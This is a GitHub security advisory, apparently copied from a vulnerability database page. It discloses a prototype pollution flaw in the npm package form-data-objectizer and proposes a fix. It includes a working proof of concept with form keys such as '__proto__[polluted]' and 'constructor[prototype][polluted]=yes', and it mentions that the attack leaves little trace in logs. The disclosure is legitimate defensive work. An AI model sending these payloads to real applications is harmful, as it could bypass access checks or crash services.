GHSA-M2HG-WJQ3-28WQ
Vulnerability from github – Published: 2026-05-18 13:28 – Updated: 2026-05-18 13:28
VLAI
Summary
form-data-objectizer: Prototype pollution in form-data-objectizer via bracket-notation form keys
Details
Summary
form-data-objectizer walks bracket-notation form keys (e.g. name[sub]) into nested objects without filtering __proto__, constructor, or prototype. A single HTTP form field whose name starts with __proto__[...] causes the library to mutate Object.prototype, which is a prototype pollution primitive of the entire Node.js process.
The bug is in treatInitial and treatSecond inside index.cjs:
if (inputName in result) { // 'in' walks the prototype chain, so '__proto__' matches
newResult = result[inputName] // newResult === Object.prototype
}
// ...
result[key] = value // sets the property on Object.prototype
With the form key __proto__[polluted] and value yes:
treatInitialmatchesinputName = "__proto__",rest = "[polluted]"."__proto__" in resultis true (inherited), sonewResult = result["__proto__"], which isObject.prototype.treatSecondrecurses withkey = "polluted",newRest = "", and assignsObject.prototype.polluted = "yes".
Affected versions
form-data-objectizer<= 1.0.0(currently the only published version)
Patched
Not yet. Suggested fix: reject any segment equal to __proto__, constructor, or prototype before walking into result[inputName] / result[key]. Either throw or skip the entry.
Minimum patch in treatInitial and treatSecond:
const REJECT = new Set(['__proto__', 'constructor', 'prototype']);
if (REJECT.has(inputName) || REJECT.has(key)) {
return; // or throw
}
Using Object.create(null) for the result object would also work since it has no prototype to pollute, but the key === '__proto__' direct write still needs guarding.
Proof of concept
Fresh install on Node 18+:
mkdir pp-fdo && cd pp-fdo
npm init -y
npm install form-data-objectizer@1.0.0
// poc.js
const FormDataToObject = require('form-data-objectizer');
const form = new FormData();
form.append('username', 'alice');
form.append('__proto__[polluted]', 'yes');
FormDataToObject.toObject(form);
console.log(({}).polluted); // -> 'yes'
Observed output:
package version: 1.0.0
before pollution: undefined
after pollution: yes
parsed data: { username: 'alice' }
confirmed: YES, prototype polluted
The field name __proto__[polluted] is the kind of value an attacker can submit from any HTML form or HTTP client. After the call, every plain object in the process inherits polluted = 'yes'. The visible parsed output drops the malicious key, so the attack leaves no obvious trace in request logs that show parsed bodies.
A second working payload is constructor[prototype][polluted]=yes, which walks result.constructor then .prototype.
Impact
- Default-reachable prototype pollution via a single unauthenticated HTTP form submission, in any Node.js application that uses
form-data-objectizer.toObject()on incoming form data. - Persists for the life of the worker process and affects every subsequent request handled by the same process.
- Direct downstream consequences depend on the host application and the rest of its dependency tree, but typical risks include: bypassing
if (obj.isAdmin)style checks, injecting unintended config values into objects merged with user input, breaking template rendering, and crashing the worker by polluting properties used by other libraries (DoS).
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L (8.2, High)
Integrity is High because the primitive lets the attacker change the meaning of property reads on every object in the process. Confidentiality is None and Availability is Low without a named downstream gadget; both could be higher in a specific consuming app.
Credit
Reported by Mohamed Bassia (@0xBassia).
Severity
8.2 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.0"
},
"package": {
"ecosystem": "npm",
"name": "form-data-objectizer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46510"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-18T13:28:31Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\n`form-data-objectizer` walks bracket-notation form keys (e.g. `name[sub]`) into nested objects without filtering `__proto__`, `constructor`, or `prototype`. A single HTTP form field whose name starts with `__proto__[...]` causes the library to mutate `Object.prototype`, which is a prototype pollution primitive of the entire Node.js process.\n\nThe bug is in `treatInitial` and `treatSecond` inside `index.cjs`:\n\n```js\nif (inputName in result) { // \u0027in\u0027 walks the prototype chain, so \u0027__proto__\u0027 matches\n newResult = result[inputName] // newResult === Object.prototype\n}\n// ...\nresult[key] = value // sets the property on Object.prototype\n```\n\nWith the form key `__proto__[polluted]` and value `yes`:\n\n1. `treatInitial` matches `inputName = \"__proto__\"`, `rest = \"[polluted]\"`.\n2. `\"__proto__\" in result` is true (inherited), so `newResult = result[\"__proto__\"]`, which is `Object.prototype`.\n3. `treatSecond` recurses with `key = \"polluted\"`, `newRest = \"\"`, and assigns `Object.prototype.polluted = \"yes\"`.\n\n## Affected versions\n\n- `form-data-objectizer` `\u003c= 1.0.0` (currently the only published version)\n\n## Patched\n\nNot yet. Suggested fix: reject any segment equal to `__proto__`, `constructor`, or `prototype` before walking into `result[inputName]` / `result[key]`. Either throw or skip the entry.\n\nMinimum patch in `treatInitial` and `treatSecond`:\n\n```js\nconst REJECT = new Set([\u0027__proto__\u0027, \u0027constructor\u0027, \u0027prototype\u0027]);\nif (REJECT.has(inputName) || REJECT.has(key)) {\n return; // or throw\n}\n```\n\nUsing `Object.create(null)` for the `result` object would also work since it has no prototype to pollute, but the `key === \u0027__proto__\u0027` direct write still needs guarding.\n\n## Proof of concept\n\nFresh install on Node 18+:\n\n```sh\nmkdir pp-fdo \u0026\u0026 cd pp-fdo\nnpm init -y\nnpm install form-data-objectizer@1.0.0\n```\n\n```js\n// poc.js\nconst FormDataToObject = require(\u0027form-data-objectizer\u0027);\n\nconst form = new FormData();\nform.append(\u0027username\u0027, \u0027alice\u0027);\nform.append(\u0027__proto__[polluted]\u0027, \u0027yes\u0027);\n\nFormDataToObject.toObject(form);\nconsole.log(({}).polluted); // -\u003e \u0027yes\u0027\n```\n\nObserved output:\n\n```\npackage version: 1.0.0\nbefore pollution: undefined\nafter pollution: yes\nparsed data: { username: \u0027alice\u0027 }\nconfirmed: YES, prototype polluted\n```\n\nThe field name `__proto__[polluted]` is the kind of value an attacker can submit from any HTML form or HTTP client. After the call, every plain object in the process inherits `polluted = \u0027yes\u0027`. The visible parsed output drops the malicious key, so the attack leaves no obvious trace in request logs that show parsed bodies.\n\nA second working payload is `constructor[prototype][polluted]=yes`, which walks `result.constructor` then `.prototype`.\n\n## Impact\n\n- Default-reachable prototype pollution via a single unauthenticated HTTP form submission, in any Node.js application that uses `form-data-objectizer.toObject()` on incoming form data.\n- Persists for the life of the worker process and affects every subsequent request handled by the same process.\n- Direct downstream consequences depend on the host application and the rest of its dependency tree, but typical risks include: bypassing `if (obj.isAdmin)` style checks, injecting unintended config values into objects merged with user input, breaking template rendering, and crashing the worker by polluting properties used by other libraries (DoS).\n\n## CVSS\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L` (8.2, High)\n\nIntegrity is High because the primitive lets the attacker change the meaning of property reads on every object in the process. Confidentiality is None and Availability is Low without a named downstream gadget; both could be higher in a specific consuming app.\n\n## Credit\n\nReported by Mohamed Bassia (@0xBassia).",
"id": "GHSA-m2hg-wjq3-28wq",
"modified": "2026-05-18T13:28:31Z",
"published": "2026-05-18T13:28:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kaspernj/form-data-objectizer/security/advisories/GHSA-m2hg-wjq3-28wq"
},
{
"type": "WEB",
"url": "https://github.com/kaspernj/form-data-objectizer/commit/7c54b99408e6e9cd6533b7245bf197dadc2a2dbc"
},
{
"type": "PACKAGE",
"url": "https://github.com/kaspernj/form-data-objectizer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "form-data-objectizer: Prototype pollution in form-data-objectizer via bracket-notation form keys"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…